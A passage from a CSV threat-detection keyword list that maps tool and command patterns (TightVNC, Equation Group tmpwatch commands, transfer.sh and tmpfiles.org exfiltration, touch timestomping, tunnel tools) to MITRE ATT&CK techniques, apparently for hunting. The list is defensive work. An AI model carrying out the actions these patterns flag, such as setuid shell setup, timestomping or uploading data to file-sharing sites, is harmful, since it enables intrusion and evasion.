T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\TightVNC Server*",".{0,1000}\\TightVNC\sServer.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\tightvnc-*",".{0,1000}\\tightvnc\-.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\TightVNC_Service_Control*",".{0,1000}\\TightVNC_Service_Control.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A" "*\TVN_log_pipe_public_name*",".{0,1000}\\TVN_log_pipe_public_name.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","named pipe https://github.com/mthcht/awesome-lists/blob/9080701200e4f9f2e523bee7cde7b335121b1cb2/Lists/suspicious_named_pipe_list.csv#L2","10","10","N/A","N/A","N/A","N/A" "*>TightVNC Viewer<*",".{0,1000}\>TightVNC\sViewer\<.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*00:\.vnc\*",".{0,1000}00\:\\\.vnc\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*GlavSoft LLC.*",".{0,1000}GlavSoft\sLLC\..{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*HKCR\.vnc*",".{0,1000}HKCR\\\.vnc.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*program files (x86)\tightvnc\*",".{0,1000}program\sfiles\s\(x86\)\\tightvnc\\.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\TightVNC*",".{0,1000}ProgramData\\TightVNC.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*TightVNC Service*",".{0,1000}TightVNC\sService.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*TightVNC Web Site.url*",".{0,1000}TightVNC\sWeb\sSite\.url.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tvnserver*",".{0,1000}tvnserver.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tvnserver.exe*",".{0,1000}tvnserver\.exe.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tvnviewer.exe*",".{0,1000}tvnviewer\.exe.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*VncViewer.Config*",".{0,1000}VncViewer\.Config.{0,1000}","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*www.tightvnc.com/download/*=",".{0,1000}www\.tightvnc\.com\/download\/.{0,1000}\=","greyware_tool_keyword","tightvnc","TightVNC is a free and Open Source remote desktop software that lets you access and control a computer over the network - often abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.tightvnc.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\tir_blanc_holiseum\*.exe*",".{0,1000}\\tir_blanc_holiseum\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","N/A","4","6","N/A","N/A","N/A","N/A" "*kindloader.exe* --extract kindlocker*",".{0,1000}kindloader\.exe.{0,1000}\s\-\-extract\skindlocker.{0,1000}","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","N/A","4","6","N/A","N/A","N/A","N/A" "*https://tmpfiles.org/dl/*.exe*",".{0,1000}https\:\/\/tmpfiles\.org\/dl\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tmpfiles.org","download of an executable files from tmpfiles.org often used by ransomware groups","T1566.002 - T1192 - T1105","TA0001 - 
TA0002","N/A","N/A","Collection","N/A","1","1","N/A","greyware tool - risk of false positive !","10","10","N/A","N/A","N/A","N/A" "*chmod 4777 /tmp/.scsi/dev/bin/gsh*",".{0,1000}chmod\s4777\s\/tmp\/\.scsi\/dev\/bin\/gsh.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*chown root:root /tmp/.scsi/dev/bin/*",".{0,1000}chown\sroot\:root\s\/tmp\/\.scsi\/dev\/bin\/.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*echo *bailing. 
try a different name\*",".{0,1000}echo\s.{0,1000}bailing\.\stry\sa\sdifferent\sname\\.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*if [ -f /tmp/tmpwatch ] * then*",".{0,1000}if\s\[\s\-f\s\/tmp\/tmpwatch\s\]\s.{0,1000}\sthen.{0,1000}","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","Malware","https://linux.die.net/man/8/tmpwatch","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*\AppData\Local\CoreAIPlatform.00\UKP\*\ukg.db*",".{0,1000}\\AppData\\Local\\CoreAIPlatform\.00\\UKP\\.{0,1000}\\ukg\.db.{0,1000}","greyware_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","will trigger if the recall is enable on the computer","5","10","1956","152","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z" "*touch -a*",".{0,1000}touch\s\-a.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*touch 
-m*",".{0,1000}touch\s\-m.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*touch -r *",".{0,1000}touch\s\-r\s.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*touch -t *",".{0,1000}touch\s\-t\s.{0,1000}","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*bihmplhobchoageeokmgbdihknkjbknd*",".{0,1000}bihmplhobchoageeokmgbdihknkjbknd.{0,1000}","greyware_tool_keyword","Touch VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://transfer.sh*",".{0,1000}https\:\/\/transfer\.sh.{0,1000}","greyware_tool_keyword","transfer.sh","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://transfert-my-files.com/files/*",".{0,1000}https\:\/\/transfert\-my\-files\.com\/files\/.{0,1000}","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://transfert-my-files.com/inc/upload.php*",".{0,1000}https\:\/\/transfert\-my\-files\.com\/inc\/upload\.php.{0,1000}","greyware_tool_keyword","transfert-my-files.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://github-com.translate.goog/*",".{0,1000}https\:\/\/github\-com\.translate\.goog\/.{0,1000}","greyware_tool_keyword","translate.goog","accessing github through google translate (evasion) false 
positive risk","T1090.003","TA0005","N/A","N/A","Defense Evasion","https://*-com.translate.goog/*","0","1","N/A","N/A","1","3","N/A","N/A","N/A","N/A" "*njpmifchgidinihmijhcfpbdmglecdlb*",".{0,1000}njpmifchgidinihmijhcfpbdmglecdlb.{0,1000}","greyware_tool_keyword","Trellonet Trellonet","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* the servers Wireguard interface.*",".{0,1000}\sthe\sservers\sWireguard\sinterface\..{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.tunnel.pyjam.as*",".{0,1000}\.tunnel\.pyjam\.as.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*// Package tunnel is a server/client package that enables to proxy public*",".{0,1000}\/\/\sPackage\stunnel\sis\sa\sserver\/client\spackage\sthat\senables\sto\sproxy\spublic.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pyjam.as/tunnel*",".{0,1000}\/pyjam\.as\/tunnel.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tunnel/server.go*",".{0,1000}\/tunnel\/server\.go.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*/tunnel/tunnel.py*",".{0,1000}\/tunnel\/tunnel\.py.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tunnel/tunnel.service*",".{0,1000}\/tunnel\/tunnel\.service.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/tunnel-main.tar.gz*",".{0,1000}\/tunnel\-main\.tar\.gz.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*3579ab708388d7be3e66c1a45deea0f6a249865ce4105310d8fe340ed28accca*",".{0,1000}3579ab708388d7be3e66c1a45deea0f6a249865ce4105310d8fe340ed28accca.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*447a5e8b424ebc3b82e909ab8c585fda579881ad26c35cba3c32b77896008c62*",".{0,1000}447a5e8b424ebc3b82e909ab8c585fda579881ad26c35cba3c32b77896008c62.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70*",".{0,1000}9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*c9165f1628aa7d5a75b907d71efda4fa4ab1fa8bb2ee12ef86478ef6e2c3e162*",".{0,1000}c9165f1628aa7d5a75b907d71efda4fa4ab1fa8bb2ee12ef86478ef6e2c3e162.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*e82ae72bb202db9bae86dc81cf4df152b6d8d3b5062295004b8ae92088904dc7*",".{0,1000}e82ae72bb202db9bae86dc81cf4df152b6d8d3b5062295004b8ae92088904dc7.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*github*koding/tunnel*",".{0,1000}github.{0,1000}koding\/tunnel.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","1","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*http://arslan.koding.io/*",".{0,1000}http\:\/\/arslan\.koding\.io\/.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","1","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*https://tunnel.pyjam.as/*",".{0,1000}https\:\/\/tunnel\.pyjam\.as\/.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://www.wireguard.com/install*",".{0,1000}https\:\/\/www\.wireguard\.com\/install.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tunnel/httpproxy.go*",".{0,1000}tunnel\/httpproxy\.go.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*wg-quick down ./tunnel.conf*",".{0,1000}wg\-quick\sdown\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wg-quick up ./tunnel.conf*",".{0,1000}wg\-quick\sup\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Write Wireguard server configuration to disk.*",".{0,1000}Write\sWireguard\sserver\sconfiguration\sto\sdisk\..{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. 
What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z" "*Write Wireguard server configuration to disk.*",".{0,1000}Write\sWireguard\sserver\sconfiguration\sto\sdisk\..{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/bin/bash -c 'wg addconf *",".{0,1000}\/bin\/bash\s\-c\s\'wg\saddconf\s.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/root/tunnel*",".{0,1000}\/root\/tunnel.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70*",".{0,1000}9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*Overwrite by setting TUNNEL_WG_INTERFACE_NAME*",".{0,1000}Overwrite\sby\ssetting\sTUNNEL_WG_INTERFACE_NAME.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pyjam.as/tunnel*",".{0,1000}pyjam\.as\/tunnel.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tunnel.pyjam.as*",".{0,1000}tunnel\.pyjam\.as.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*TUNNEL_WG_INTERFACE_NAME=*",".{0,1000}TUNNEL_WG_INTERFACE_NAME\=.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to 
